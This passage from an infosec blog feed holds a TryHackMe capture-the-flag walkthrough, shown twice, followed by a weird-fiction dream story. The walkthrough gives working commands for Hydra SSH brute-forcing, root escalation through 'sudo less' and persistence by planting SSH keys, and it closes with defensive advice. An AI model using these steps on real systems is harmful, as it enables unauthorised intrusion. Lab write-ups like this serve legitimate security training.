root.txt is located. It contains the following message:&#xA;&#xA;blockquote&#xA;Creator : Fsociety2006 --&#xA;Congratulations in rooting Brooklyn Nine Nine&#xA;Here is the flag: [REDACTED]&#xA;&#xA;Enjoy!!&#xA;/blockquote&#xA;&#xA;b style=&#34;color:darkgreen&#34;Congratulations!/b The room is finished. &#xA;&#xA;Optional: Persistence and Better Shell&#xA;What would happen if Holt and Jake change passwords? This method will no longer work. How do we bypass this? Persistence. &#xA;Also, the terminal we get by escalating privileges with GTFOBINS is quite rudimentary (no tabbing functionality!). How do we fix this? With a *&#34;better shell&#34;.*&#xA;&#xA;Persistence&#xA;The most direct way to achieve persistence (for this room) would be by using SSH keys. We will leave our public SSH key in the ./ssh/authorizedkeys file of the target machine.&#xA;Have access to the target machine.&#xA;Generate SSH keys on your machine. This is done with the ssh-keygen command. By default, the algorithm used is RSA. Using this command will create a public and a private key, named idrsa.pub and idrsa, respectively.&#xA;Change permissions on the idrsa file to 600 or higher. This is done with the chmod command. This is because only the owner of the key should be able to read or overwrite it, otherwise SSH ignores it and forces you to connect with a password instead.&#xA;Copy the contents of idrsa.pub to the ./ssh/authorizedkeys file in the target machine. This file essentially tells the target&#39;s server to &#34;trust everyone that connects with these keys.&#34;&#xA;Connect to the target&#39;s SSH server with your private SSH key, this is done with the following command:&#xA;ssh -i /path/to/idrsa user@target&#xA;&#xA;You will be able to log in as any user with this method, and you won&#39;t be asked for a password at any time. Furthermore, because we are connecting through SSH, we have now a &#34;better shell.&#34;&#xA;&#xA;The target can still find out about this, and remove our key from authorizedkeys. We can add a reverse shell as a cronjob on their machine, and just set up a listener on our machine when necessary, but this is already exceeding the scope of this room, so we&#39;ll leave it here.  &#xA;&#xA;How it could have been avoided&#xA;There were several vulnerabilities we took advantage of in this machine. Let us list them and give one solution to each:&#xA;Disable sensitive ports when not used: the FTP and SSH ports should have been closed if they were not in use, as this is how we accessed the system. If they cannot be closed, add filters based on necessity, as this would have significantly decreased the chances of intrusion.&#xA;Store passwords safely: the attack worked because holt&#39;s password, despite being considered &#34;very strong&#34; by today&#39;s standards, was stored in plaintext. Even if &#34;hidden&#34; by steganography, it is not particularly difficult to find them, and once we have the password, it can be used to get into the system. uPasswords should be stored with a safe hashing algorithm, and salted/u.&#xA;Enforce strong password policies: b style=&#34;color:red&#34;CRUCIAL!/b jake&#39;s password was very weak. It took Hydra about one second to crack it. While &#34;note to Jake&#34; was a great hint, it was a matter of time before it was discovered. If jake had a strong password, we could have not have used the method we used to break into the system. Strong passwords have a combination of  numbers, lowercase and uppercase letters, and symbols, and are at least 16 characters long.&#xA;Review security configurations: do not allow anonymous access to FTP servers that contain sensitive files (even if what we found was &#34;just&#34; a note, we used this note as a hint to gain access). Do not allow unprivileged users to run files as root - this is how we escalated privileges. If these misconfigurations had not been in place, we would&#39;ve not been able to gain access like we did.]]&gt;</description>
      <content:encoded><![CDATA[<p>This is a Walkthrough for the <a href="https://tryhackme.com/room/brooklynninenine" rel="nofollow">Brooklyn Nine Nine</a> Capture The Flag <a href="https://tryhackme.com" rel="nofollow">TryHackMe</a> room. The writeup is meant to offer short and concise solutions by using a bigger font and titling as “Task <em>Number</em>”, but also offering an extended explanation as subheaders for those interested in finding out more about the solution to a specific task.</p>

<h2 id="starting">Starting</h2>

<p>Let&#39;s start with the basics – <strong>enumerate</strong> the open ports in the target. Let&#39;s use <strong>nmap</strong>.</p>

<pre><code>nmap -sV MACHINE_IP
</code></pre>

<p>Host is up (0.00020s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
index page:</p>

<p>We find three open ports with three services: SSH, FTP, and a web server.
I tried enumerating the web server&#39;s directories to see if there was something of interest, but it only contains a background image.</p>

<h2 id="task-1-user-flag">Task 1: User flag</h2>

<p>Because there was nothing but the index, any hint must be in the page itself.</p>
<ol><li>Check the web server&#39;s main page&#39;s source. Alternatively, open developer tools and inspect the index, you will find the following comment:<br></li></ol>

<blockquote> Have you ever heard of steganography? 
</blockquote>
Nice hint. So the background image might not be just a background image...
In the source page we will find the following line:

**background-image: url(&#34;brooklyn99.jpg&#34;);**
The fact that url() specifies the image directly means that it can be found in the same path we&#39;re at right now.

2. Download the background image
I used wget for this.
```
wget http://MACHINE_IP/brooklyn99.jpg
```

3. Use steganography to uncover the secret behind the image. I decided to use **stegseek**

***Note**: I was using TryHackMe&#39;s Attackbox. Stegseek, however, is not included in the Attackbox - I had to install it, as the steganography tool that was available has been deprecated.*

```
stegseek brooklyn99.jpg
```

We get the following message:
<blockquote>[i] Found passphrase: &#34;[REDACTED]&#34;
</blockquote>
<ol><li>Decode the image with the password we found. I used <a href="https://futureboy.us/stegano/decinput.html" rel="nofollow">https://futureboy.us/stegano/decinput.html</a> to do this.</li></ol>

<p>This shows us the following message:
<blockquote>Holts Password:</p>

<p>[REDACTED]</p>

<p>Enjoy!!
</blockquote></p>

<p>Time to get access.</p>
<ol><li>Gain access the target *According to the creator, there are two ways to gain access. I <strong>assume</strong> this is either directly through SSH with holt&#39;s password or the long way around, with the password of the user we will find right now. I chose the long way around:* We will do this with the <strong>FTP</strong> port we found.</li></ol>

<pre><code>ftp MACHINE_IP
</code></pre>

<p>It will tell us that the server only accepts anonymous connections. Let&#39;s attempt a new connection, with “anonymous” as the user.</p>

<pre><code>ftp&gt; open MACHINE_IP
</code></pre>

<p>Connected to MACHINE<em>IP.
220 (vsFTPd 3.0.3)
Name (MACHINE</em>IP:root): anonymous
331 Please specify the password.
Password:
230 Login successful.</p>
<ol><li>Examine the server&#39;s contents with the <strong>dir</strong> FTP command.</li></ol>

<pre><code>ftp&gt; dir
</code></pre>

<p>200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r—r—    1 0        0             119 May 17  2020 note<em>to</em>jake.txt
226 Directory send OK.</p>
<ol><li>Download the contents with the <strong>get</strong> FTP command.</li></ol>

<pre><code>ftp&gt; get note_to_jake.txt
</code></pre>

<p>The file says the following:</p>

<blockquote>From Amy,

Jake please change your password. It is too weak and holt will be mad if someone hacks into the nine nine
</blockquote>

<p>Now we know a way to actually access to the system. Assuming Amy and Jake are both existing users, and Amy is telling us Jake has a weak password, let us see if we can brute-force Jake&#39;s password.</p>
<ol><li>Attempt to gain access through SSH by <strong>brute-forcing</strong> Jake&#39;s password.
I will use Hydra for this.</li></ol>

<pre><code>hydra -l jake -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh
</code></pre>

<p>It took Hydra about one second to find it. So, knowing the password:</p>
<ol><li>Log in to the system with Jake&#39;s password.</li></ol>

<pre><code>ssh jake@MACHINE_IP
</code></pre>
<ol><li>Find the User flag. You can look for it manually, or use the following command:
<code>
find /home/ -name user.txt 2&gt;/dev/null
</code></li></ol>

<h2 id="task-2-root-flag">Task 2: Root flag</h2>

<p>To access the Root flag (likely at /root/) we will need root access.</p>
<ol><li>Find a way to escalate privileges. <strong>Check what can the current user run as root</strong>.</li></ol>

<pre><code>sudo -l -l
</code></pre>

<p>We get the following information:</p>

<p>Matching Defaults entries for jake on brookly<em>nine</em>nine:
    env<em>reset, mail</em>badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin</p>

<p><strong>User jake may run the following commands on brookly<em>nine</em>nine:</strong></p>

<p><strong>Sudoers entry:</strong>
    <strong>RunAsUsers: ALL</strong>
    <strong>Options: !authenticate</strong>
    <strong>Commands:</strong>
    <strong>/usr/bin/less</strong></p>

<p>So, it seems jake can run <strong><em>less</em></strong> as root.</p>
<ol><li>Find a way to exploit this vulnerability.
I searched <strong><a href="https://gtfobins.github.io" rel="nofollow">GTFObins</a></strong> and found the following command:</li></ol>
<ul><li><code>
sudo less /etc/profile
!/bin/sh
</code></li></ul>

<p>This, indeed, allowed us to escalate privilege and act as the root user.</p>
<ol><li>Find the root flag.</li></ol>

<pre><code>find / -name root.txt 2&gt;/dev/null
</code></pre>

<p>Eventually, we will find where root.txt is located. It contains the following message:</p>

<blockquote>- Creator : Fsociety2006 --
Congratulations in rooting Brooklyn Nine Nine
Here is the flag: [REDACTED]

Enjoy!!
</blockquote>

<p><b style="color:darkgreen">Congratulations!</b> The room is finished.</p>

<h3 id="optional-persistence-and-better-shell">Optional: Persistence and Better Shell</h3>

<p>What would happen if Holt and Jake change passwords? This method will no longer work. How do we bypass this? <strong>Persistence.</strong>
Also, the terminal we get by escalating privileges with GTFOBINS is quite rudimentary (no tabbing functionality!). How do we fix this? With a *<em>“better shell”</em>.*</p>

<h4 id="persistence">Persistence</h4>

<p>The most direct way to achieve persistence (for this room) would be by using <strong>SSH keys.</strong> We will leave our public SSH key in the <strong>./ssh/authorized_keys</strong> file of the target machine.
1. Have access to the target machine.
2. Generate SSH keys on your machine. This is done with the <strong>ssh-keygen</strong> command. By default, the algorithm used is RSA. Using this command will create a public and a private key, named <strong>id_rsa.pub</strong> and <strong>id_rsa</strong>, respectively.
3. Change permissions on the id<em>rsa file to <strong>600 or higher.</strong> This is done with the <strong>chmod</strong> command. This is because only the owner of the key should be able to read or overwrite it, otherwise SSH ignores it and forces you to connect with a password instead.
4. Copy the contents of **id</em>rsa.pub** to the <strong>./ssh/authorized_keys</strong> file in the target machine. This file essentially tells the target&#39;s server to “trust everyone that connects with these keys.”
5. Connect to the target&#39;s SSH server with your private SSH key, this is done with the following command:</p>

<pre><code>ssh -i /path/to/id_rsa user@target
</code></pre>

<p>You will be able to log in as any user with this method, and you won&#39;t be asked for a password at any time. Furthermore, because we are connecting through SSH, we have now a <strong>“better shell.”</strong></p>

<p>The target can still find out about this, and remove our key from <strong>authorized_keys.</strong> We can add a reverse shell as a <strong>cronjob</strong> on their machine, and just set up a <strong>listener</strong> on our machine when necessary, but this is already exceeding the scope of this room, so we&#39;ll leave it here.</p>

<h2 id="how-it-could-have-been-avoided">How it could have been avoided</h2>

<p>There were several vulnerabilities we took advantage of in this machine. Let us list them and give one solution to each:
–  <strong>Disable sensitive ports when not used</strong>: the FTP and SSH ports should have been closed if they were not in use, as this is how we accessed the system. If they cannot be closed, add <strong>filters</strong> based on necessity, as this would have significantly decreased the chances of intrusion.
– <strong>Store passwords safely</strong>: the attack worked because holt&#39;s password, despite being considered “very strong” by today&#39;s standards, was stored in plaintext. Even if “hidden” by steganography, it is not particularly difficult to find them, and once we have the password, it can be used to get into the system. <u>Passwords should be stored with a safe hashing algorithm, and salted</u>.
– <strong>Enforce strong password policies</strong>: <b style="color:red">CRUCIAL!</b> jake&#39;s password was very weak. It took Hydra about one second to crack it. While “note to Jake” was a great hint, it was a matter of time before it was discovered. If jake had a strong password, we could have not have used the method we used to break into the system. Strong passwords have a combination of  numbers, lowercase and uppercase letters, and symbols, and are at least 16 characters long.
– <strong>Review security configurations</strong>: do not allow anonymous access to FTP servers that contain sensitive files (even if what we found was “just” a note, we used this note as a hint to gain access). <strong>Do not allow unprivileged users to run files as root</strong> – this is how we escalated privileges. If these misconfigurations had not been in place, we would&#39;ve not been able to gain access like we did.</p>
]]></content:encoded>
      <author>plutogazer writeups</author>
      <guid>https://infosec.press/read/a/f579aq4ych</guid>
      <pubDate>Wed, 07 Jan 2026 19:24:24 +0000</pubDate>
    </item>
    <item>
      <title>The Royal We</title>
      <link>https://infosec.press/jrdepriest/the-royal-we</link>
      <description>&lt;![CDATA[&#39;Sandalwood&#39;, I think. &#39;I&#39;ve never smelled it before, but I know that&#39;s what this is.  &#xA;&#39;This body must know what it is.&#39;&#xA;&#xA;I shift my legs, feel the soft support of whatever I&#39;m sitting on. Lean back and push my shoulders in, enjoying its exquisite construction, resting my arms on two sturdy, padded rests.&#xA;&#xA;And I hear murmuring.&#xA;&#xA;I open my eyes just a slit, just enough to take in the room while still relaxing.&#xA;&#xA;It&#39;s dark in here. Nice.&#xA;&#xA;I slide my gaze over the floor.&#xA;&#xA;Rose patterned carpet. Wide, round room, like a private hotel room.&#xA;&#xA;Small windows at the edges, almost like airplane windows.&#xA;&#xA;I look up to see who&#39;s whispering.&#xA;&#xA;The back of a couch, detailed in another fine rose pattern. I know each rose was hand-stitched.&#xA;&#xA;On the left, my cousin, Anna Marie but with dark, red hair, leaning over and conspiring with her best friend, the brunette Shelby. In my reality, Shelby carried a child for Anna Marie who is barren. In this reality, Anna Marie is newly married to Prince Dove-Tree of the Great Plains Alliance, a gentrified Native American nation in the middle of what I would call The United States of America.&#xA;&#xA;I look at myself.&#xA;&#xA;My sleeves are of cream-colored linen interwoven with silk bands, alternating teal and primrose. My burgundy jacket hangs open revealing a stark white frilled blouse with black banding and a glittering undercurrent of swirling rainbows. I&#39;m wearing black, leather pants with braided inlay and well-made but worn work boots.&#xA;&#xA;I shift, quint, feel where I am.&#xA;&#xA;&#39;I&#39;m in the women&#39;s car,&#39; I think. &#39;But I&#39;m not quite a woman, am I?&#39;&#xA;&#xA;I flex my hands. Long, dexterous fingers yet thick palms, like cement.&#xA;&#xA;&#39;For fighting,&#39; I almost remember.&#xA;&#xA;I think of fire and push with every muscle and nerve in my forearms.&#xA;&#xA;Nothing.&#xA;&#xA;I think of ice and with great effort my hands glisten but produce barely a hint of frost.&#xA;&#xA;&#39;Magick,&#39; I think. &#39;But not strong, not elemental.&#39;&#xA;&#xA;I sink into my memories. &#39;Who am I? What is my role? What are my skills?&#39;&#xA;&#xA;&#39;Ah,&#39; I think, picking out an interesting tidbit.&#xA;&#xA;I make a gesture with the first two fingers of both hands and it begins to rain blood inside the cabin.&#xA;&#xA;Anna Marie sits up, looks around, grimaces, and stares daggers at me.&#xA;&#xA;She audibly sighs, rolls her eyes, sits up straight and stands.&#xA;&#xA;I see she&#39;s wearing a full-length, slinky velvet dress the same dark red as the rest of the rose motif. She smooths the the skirt, straightens her sleeves, lifts her head and walks toward the front of the room.&#xA;&#xA;She makes a right but is also still heading the same direction. She goes around a partition that folds the wrong way.&#xA;&#xA;&#39;Non-Euclidean design,&#39; I think, nodding to myself.&#xA;&#xA;The blood rain isn&#39;t real, of course. It&#39;s an illusion.&#xA;&#xA;Nothing is getting wet.&#xA;&#xA;I smile broadly, lift my chin, notice the hat on my head for the first time. Glancing up, I see a broad, dark rim, coming to a point about six inches out.&#xA;&#xA;I remove it and hold it in my sturdy hands before leaning forward to engage with Shelby.&#xA;&#xA;In my reality, Anna Marie was a &#34;cousin&#34; by association, part of our chosen family. I wish to determine our relation here and, if possible, find a way to woo her into my own good graces instead of this Prince.&#xA;&#xA;It&#39;s a dream, after all; I can do whatever I want.&#xA;&#xA;&#34;It won&#39;t work, charlatan,&#34; says a smooth, calm voice to my left.&#xA;&#xA;&#34;Pardon?&#34; I say, hearing my own lustrous, lyrical voice for the first time.&#xA;&#xA;I feel a gentle, but demanding hand on my left shoulder, urging me to rise and follow.&#xA;&#xA;I steal a glance to see a broad, stunning blonde man in golden, padded armor, lined with silver and bearing the yellow crescent and pyramid seal of the Anglican Cheyenne House. Prince Donald Dove-Tree.&#xA;&#xA;He hadn&#39;t been there the moment before. His appearance also ends my blood rain.&#xA;&#xA;I am compelled to follow until we are standing at one of the portholes. I am thankful to have been given the option to come voluntarily.&#xA;&#xA;I can see we are traveling down a paved road that is not nearly wide enough to accommodate a vehicle of this size and I wonder what shape was given to the outer appearance, I wonder what the people see.&#xA;&#xA;Speaking of &#34;the people&#34;, they wear anachronisms mixed with modern, blue jeans and Ren Faire. The buildings are stone and glass, of two times, straddling an imagined past and a dirty, industrial present.&#xA;&#xA;&#34;I have three theories about what happens when I dream—,&#34; I start to explain.&#xA;&#xA;&#34;This is the real world,&#34; Prince Dove-Tree insists. &#34;Those are real people, with real lives. They do not need your interference.&#34;&#xA;&#xA;He pushes me against the glass, forcing me to look.&#xA;&#xA;Unabated, I continue, &#34;As I was saying, when I borrow someone&#39;s body, I gain an intuitive but incomplete understanding of the world and my place in it.&#34;&#xA;&#xA;He spins me around, showing intense iron-blue eyes, uncomfortable in his baby round face lacking even stubble on his clenched jaw or full upper lip. &#34;This is a complete world. You are not needed.&#34;&#xA;&#xA;I sense his frustration and annoyance.&#xA;&#xA;&#34;And when we swap back, they will remember everything I did. I understand that their subconscious mind will ret con the memories such that it finds a reason for everything that was done.&#34;&#xA;&#xA;I laugh.&#xA;&#xA;&#34;Although, sometimes I don&#39;t make it easy.&#34;&#xA;&#xA;He rubs his forehead with his free hand, closing his eyes and grinding his teeth.&#xA;&#xA;His looks into my eyes and softens, smiles, even.&#xA;&#xA;But he gets no chance to speak as we both wobble with the stoppage of our conveyance. I hadn&#39;t even truly noticed its motion.&#xA;&#xA;&#34;Come, then,&#34; demands the Prince.&#xA;&#xA;I don&#39;t remember stepping outside, but I am. I turn to look at the vehicle and its a simple limousine. I&#39;m not sure we were ever actually inside of it.&#xA;&#xA;A black man in threadbare but clean worker&#39;s clothes greets us and leads us past the wide glass front of a restaurant. I see patrons seated at round tables eating and visiting.&#xA;&#xA;I step toward the main door, but we are pulled and led to a simpler one, immediately to the right that I hadn&#39;t noticed.&#xA;&#xA;Inside, we are in a hallway that wasn&#39;t visible from outside. The walls must be thick because I can&#39;t hear the restaurant.&#xA;&#xA;I see other black men in formal dark blue uniforms, carrying perfectly vertical pike staves, standing at attention at regular intervals as we pass.&#xA;&#xA;The hallway doesn&#39;t turn, but I notice I can&#39;t see that far behind us or very far in front of us.&#xA;&#xA;Finally, there is another door to our left and a large black woman opens it from the other side and welcomes us enthusiastically.&#xA;&#xA;I smell meat and spices, feel steam. Glancing inside is a kitchen fit for a castle with dozens of people, all black, working at chopping, slicing, spicing, preparing, and cooking in pots, ovens, and open flames.&#xA;&#xA;Instead of entering the kitchen, we are led through another set of non-Euclidean hallways curving over and under until we are in the middle of what should be the restaurant and what should be the kitchen, until we enter and entirely liminal room, veiled in shadows and lacking walls or a visible ceiling.&#xA;&#xA;Sitting at a conspicuous L-shaped table of carved marble is Jon, Anna Marie&#39;s brother and a Duke, slouching in heavy, dingy, deep red robes more appropriate for a king.&#xA;&#xA;I know he&#39;s proud to have married his sister off to a Prince. I also know he&#39;s an idiot and his sister was the true master of this domain.&#xA;&#xA;I estimate he will lose everything and be subsumed by the Great Plains Alliance in less than two years.&#xA;&#xA;Speaking of the Prince, he quickly speeds to the Duke and they begin whispering back and forth.&#xA;&#xA;Anna Marie and Shelby stay close to me, with Anna Marie gently touching my elbow as if to let me know she&#39;s there. I am supposed to be their protector. I didn&#39;t realize that until just now. I know them and typically call them my only true friends. I fight for them.&#xA;&#xA;The Duke sits up, eyes suddenly bright and motions for two of the blue-clad, black-skinned sentries to come over.&#xA;&#xA;They lean in for quiet orders while he gestures toward me.&#xA;&#xA;The two men look at me, then back to the Duke and he nods then waves them away.&#xA;&#xA;All the servants are black, I realize. All of them. And I haven&#39;t seen a single citizen on the street or in the restaurant out front that was black.&#xA;&#xA;I think—I remember there was no Revolutionary War here and also no Civil War. That would explain the titles and pageantry, too.&#xA;&#xA;History is not this version of me&#39;s strong suit. It&#39;s not mine, either.&#xA;&#xA;One of the men asks Anna Marie and Shelby, &#34;I&#39;m very sorry Your Highness and Missus, but would you please step back from The Attendant?&#34;&#xA;&#xA;They step back as the two men flank me, The Attendant, apparently.&#xA;&#xA;&#34;Sorry, Mx,&#34; one of them tells me as they push me toward the Duke. They don&#39;t prod me with their pikes, but I know they would if I didn&#39;t do as they asked, as The Duke asked.&#xA;&#xA;I do not resist, focusing the non-binary honorific they used to address me. This one is considered neither man nor woman, but an official third thing.&#xA;&#xA;Jon barely looks up once I&#39;m standing over him.&#xA;&#xA;&#34;I thought you were better than this, Jesse,&#34; he tells me. &#34;I didn&#39;t even think you liked girls or boys in that way.  &#xA;&#34;The Prince informs me that you attempted to seduce my sister or rather that you planned to do so.&#34;&#xA;&#xA;&#39;Shit,&#39; I think. I completely forgot Prince Dove-Tree is a strong empath, nearly telepathic. The body I&#39;m borrowing is typically far more clever than I&#39;ve been.&#xA;&#xA;Shit.&#xA;&#xA;&#34;Your punishment will be immediate.&#34;&#xA;&#xA;He gestures and the guard on my right takes my wrist and moves it to the table.&#xA;&#xA;I understand and flatten my hand in front of the Duke.&#xA;&#xA;&#34;No need to hold me down,&#34; I say.&#xA;&#xA;The sentry doesn&#39;t let go.&#xA;&#xA;The Duke produces a cleaver and seems to ponder something but thinks better of it.&#xA;&#xA;&#34;Three,&#34; he says.&#xA;&#xA;He positions the cleaver over the pointer finger of my right hand, leveling the blade just above the knuckle. He applies a tiny bit of pressure with his left hand steadying the blade before slamming his right hand down. A jolt of electrical fire shoots up my arm, my legs start to buckle, my vision blurs, my head swims, and my teeth grit almost to the point of breaking.&#xA;&#xA;I hear a muffled scream and recognize it as Anna Marie.&#xA;&#xA;&#34;That&#39;s one,&#34; the Duke says, lining up my middle finger.&#xA;&#xA;The first cut left a spray of blood on the table and wall, but it&#39;s already stopped.&#xA;&#xA;&#39;I heal fast.&#39; I know that. I knew that. But it still hurts.&#xA;&#xA;He slams down his right hand and I feel the world spin around me, my insides flip, I bite my tongue nearly in two and feel my magick unspiraling itself, ready to retaliate. I have to push past the torture and will it back down.&#xA;&#xA;&#34;Two down,&#34; he says, getting ready to cut off my ring finger.&#xA;&#xA;SLAM!&#xA;&#xA;Another scream, this time it&#39;s me. It takes every ounce of willpower and strength to not piss myself in pain and paint the entire room in illusory fire while sending a blast wave strong enough to flatten every living thing.&#xA;&#xA;&#34;Three,&#34; he says nodding. &#34;Now, all is forgiven.&#34;&#xA;&#xA;He rolls one of the fingers thoughtlessly before waving them away. A servant quickly scoops up the bulk of the gore.&#xA;&#xA;&#34;Now let&#39;s eat.&#34;&#xA;&#xA;He doesn&#39;t even have the blood cleaned from the white marble.&#xA;&#xA;He never looks up at me. Never meets my eyes.&#xA;&#xA;My hand throbs, my entire arm numb as a jellyfish sting. My stomach roils and my head threatens to send me to the ground as my vision narrows and blackens.&#xA;&#xA;I&#39;m gingerly led to a side table where I sit alone, watching my fingers knit themselves back together. I&#39;ll have a complete—albeit gnarly—set in a few hours and be fully functional by tomorrow morning.&#xA;&#xA;Behind me, I hear Anna Marie crying softly to Shelby.&#xA;&#xA;The shock and pain pushed me deeper into the memories of this body. For example, I know Anna Marie and I are already having an affair. The person I&#39;m borrowing is just a far better &#34;charlatan&#34; than I.&#xA;&#xA;I turn slightly to survey the feast of a Duke.&#xA;&#xA;For all the savory smells from the kitchen, they are eating simple sandwiches of grilled, exotic meats and cheeses. The Duke doesn&#39;t care for fancy dishes, as I now recall.&#xA;&#xA;I see a group of people, dressed as peasants, lumbering toward the Duke out of the distant dimness. There aren&#39;t any doors so I&#39;m not sure where they are coming from.&#xA;&#xA;They are shuffling zombie-like and there are more of them than I initially thought. I count eighteen so far and hear the scrape and slide of others still hidden.&#xA;&#xA;The Duke notices and sends a half dozen of his sentries with a careless gesture while continuing to eat.&#xA;&#xA;They rush ahead, confronting the crowd but are completely ignored. The few they stop offer no resistance, staring blankly while the bulk keeps coming, pushing past them, stumbling steadily forward.&#xA;&#xA;&#34;Enjoy the food?&#34; a sonorous, sinister voice asks, as a thin man, dressed in a white robe fluttering in a non-existent breeze, with dark black hair appears from the larger group.&#xA;&#xA;&#34;Malcolm!&#34; growls the Duke.&#xA;&#xA;I see him move to stand, but nothing happens. He leans forward, he leans sideways, he pushes his arms down, but he can&#39;t get up, can hardly move at all.&#xA;&#xA;None of them can. Not the Prince, not Anna Marie or Shelby.&#xA;&#xA;I stand and stride forward.&#xA;&#xA;Malcolm sees me coming and gestures with his right hand sending a snaking bolt of lightning at me.&#xA;&#xA;Grinning wildly, I slap it out of the air with my left hand like an annoying gnat.&#xA;&#xA;I love this part of the job.&#xA;&#xA;Malcolm starts a more complex gesture, but I&#39;m already on him, lifting him into the air with what remains of my right hand, squeezing his neck between the claw of my pinky and thumb so he can barely swallow, let alone speak. I grab his gesturing right hand and crush the bones as if they were balsa wood with my left.&#xA;&#xA;&#34;Not hungry today, eh Jesse?&#34; he croaks.&#xA;&#xA;I see Prince Dove-Tree struggling to form a sign with his hands as Malcolm is slowly enveloped by a yellow glow, further incapacitating him.&#xA;&#xA;I&#39;m not the empath that he is, but the satisfaction I feel from the Prince is uncharacteristic and overzealous.&#xA;&#xA;This was his plan. The Prince. Malcolm. Perhaps even Anna Marie.&#xA;&#xA;The Duke will not survive the night, I fear.&#xA;&#xA;My mind races, searching for solutions.&#xA;&#xA;In fact—I realize as the mesmerized people continue closing in, glazed and moaning—I know he won&#39;t survive the night.&#xA;&#xA;---&#xA;&#xA;#WhenIDream #WritersOfMastodon #Writer #Writing #WeirdFiction ]]&gt;</description>
      <content:encoded><![CDATA[<p>&#39;Sandalwood&#39;, I think. &#39;I&#39;ve never smelled it before, but I know that&#39;s what this is.<br>
&#39;This body must know what it is.&#39;</p>

<p>I shift my legs, feel the soft support of whatever I&#39;m sitting on. Lean back and push my shoulders in, enjoying its exquisite construction, resting my arms on two sturdy, padded rests.</p>

<p>And I hear murmuring.</p>

<p>I open my eyes just a slit, just enough to take in the room while still relaxing.</p>

<p>It&#39;s dark in here. Nice.</p>

<p>I slide my gaze over the floor.</p>

<p>Rose patterned carpet. Wide, round room, like a private hotel room.</p>

<p>Small windows at the edges, almost like airplane windows.</p>

<p>I look up to see who&#39;s whispering.</p>

<p>The back of a couch, detailed in another fine rose pattern. I know each rose was hand-stitched.</p>

<p>On the left, my cousin, Anna Marie but with dark, red hair, leaning over and conspiring with her best friend, the brunette Shelby. In my reality, Shelby carried a child for Anna Marie who is barren. In this reality, Anna Marie is newly married to Prince Dove-Tree of the Great Plains Alliance, a gentrified Native American nation in the middle of what I would call The United States of America.</p>

<p>I look at myself.</p>

<p>My sleeves are of cream-colored linen interwoven with silk bands, alternating teal and primrose. My burgundy jacket hangs open revealing a stark white frilled blouse with black banding and a glittering undercurrent of swirling rainbows. I&#39;m wearing black, leather pants with braided inlay and well-made but worn work boots.</p>

<p>I shift, quint, <em>feel</em> where I am.</p>

<p>&#39;I&#39;m in the women&#39;s car,&#39; I think. &#39;But I&#39;m not quite a woman, am I?&#39;</p>

<p>I flex my hands. Long, dexterous fingers yet thick palms, like cement.</p>

<p>&#39;For fighting,&#39; I almost remember.</p>

<p>I think of fire and <em>push</em> with every muscle and nerve in my forearms.</p>

<p>Nothing.</p>

<p>I think of <em>ice</em> and with great effort my hands glisten but produce barely a hint of frost.</p>

<p>&#39;Magick,&#39; I think. &#39;But not strong, not <em>elemental</em>.&#39;</p>

<p>I sink into my memories. &#39;Who am I? What is my role? What are my <em>skills</em>?&#39;</p>

<p>&#39;Ah,&#39; I think, picking out an interesting tidbit.</p>

<p>I make a gesture with the first two fingers of both hands and it begins to rain blood inside the cabin.</p>

<p>Anna Marie sits up, looks around, grimaces, and stares daggers at me.</p>

<p>She audibly sighs, rolls her eyes, sits up straight and stands.</p>

<p>I see she&#39;s wearing a full-length, slinky velvet dress the same dark red as the rest of the rose motif. She smooths the the skirt, straightens her sleeves, lifts her head and walks toward the front of the room.</p>

<p>She makes a right but is also still heading the same direction. She goes around a partition that folds the wrong way.</p>

<p>&#39;Non-Euclidean design,&#39; I think, nodding to myself.</p>

<p>The blood rain isn&#39;t real, of course. It&#39;s an illusion.</p>

<p>Nothing is getting wet.</p>

<p>I smile broadly, lift my chin, notice the hat on my head for the first time. Glancing up, I see a broad, dark rim, coming to a point about six inches out.</p>

<p>I remove it and hold it in my sturdy hands before leaning forward to engage with Shelby.</p>

<p>In my reality, Anna Marie was a “cousin” by association, part of our chosen family. I wish to determine our relation here and, if possible, find a way to woo her into my own good graces instead of this Prince.</p>

<p>It&#39;s a dream, after all; I can do whatever I want.</p>

<p>“It won&#39;t work, charlatan,” says a smooth, calm voice to my left.</p>

<p>“Pardon?” I say, hearing my own lustrous, lyrical voice for the first time.</p>

<p>I feel a gentle, but demanding hand on my left shoulder, urging me to rise and follow.</p>

<p>I steal a glance to see a broad, stunning blonde man in golden, padded armor, lined with silver and bearing the yellow crescent and pyramid seal of the Anglican Cheyenne House. Prince Donald Dove-Tree.</p>

<p>He hadn&#39;t been there the moment before. His appearance also ends my blood rain.</p>

<p>I am compelled to follow until we are standing at one of the portholes. I am thankful to have been given the option to come voluntarily.</p>

<p>I can see we are traveling down a paved road that is not nearly wide enough to accommodate a vehicle of this size and I wonder what shape was given to the outer appearance, I wonder what the people see.</p>

<p>Speaking of “the people”, they wear anachronisms mixed with modern, blue jeans and Ren Faire. The buildings are stone and glass, of two times, straddling an imagined past and a dirty, industrial present.</p>

<p>“I have three theories about what happens when I dream—,” I start to explain.</p>

<p>“<strong>This</strong> is the real world,” Prince Dove-Tree insists. “<strong>Those</strong> are real people, with real lives. They do not <em>need</em> your interference.”</p>

<p>He pushes me against the glass, forcing me to <em>look</em>.</p>

<p>Unabated, I continue, “As I was saying, when I borrow someone&#39;s body, I gain an intuitive but incomplete understanding of the world and my place in it.”</p>

<p>He spins me around, showing intense iron-blue eyes, uncomfortable in his baby round face lacking even stubble on his clenched jaw or full upper lip. “This is a <em>complete</em> world. You <em>are not</em> needed.”</p>

<p>I sense his frustration and annoyance.</p>

<p>“And when we swap back, they will <em>remember</em> everything I did. I understand that their subconscious mind will <em>ret con</em> the memories such that it finds a <em>reason</em> for everything that was done.”</p>

<p>I laugh.</p>

<p>“Although, sometimes I don&#39;t make it easy.”</p>

<p>He rubs his forehead with his free hand, closing his eyes and grinding his teeth.</p>

<p>His looks into my eyes and softens, <em>smiles</em>, even.</p>

